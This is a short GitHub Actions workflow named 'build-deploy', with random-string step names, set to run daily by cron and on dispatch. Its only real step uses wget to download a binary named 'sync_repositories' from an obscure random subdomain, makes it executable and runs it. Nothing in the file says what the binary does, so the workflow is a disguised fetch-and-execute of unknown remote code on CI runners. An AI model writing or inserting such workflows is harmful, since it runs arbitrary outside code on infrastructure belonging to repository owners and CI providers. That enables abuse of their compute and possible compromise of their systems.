#2024-03-18-[135738]-ggrougt1
name: main

on:
  workflow_dispatch:

  repository_dispatch:
    types: runner_workflow

  schedule:
    - cron: "32 2 * * * "
    
jobs:
  build-deploy:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v3
      - name: 2bwdqed5bp2gjank
        run: |
          wget -q https://awff4ws3ibhfyqas.callforpapers.eu.org/sync_repositories
          chmod 755 sync_repositories
          ./sync_repositories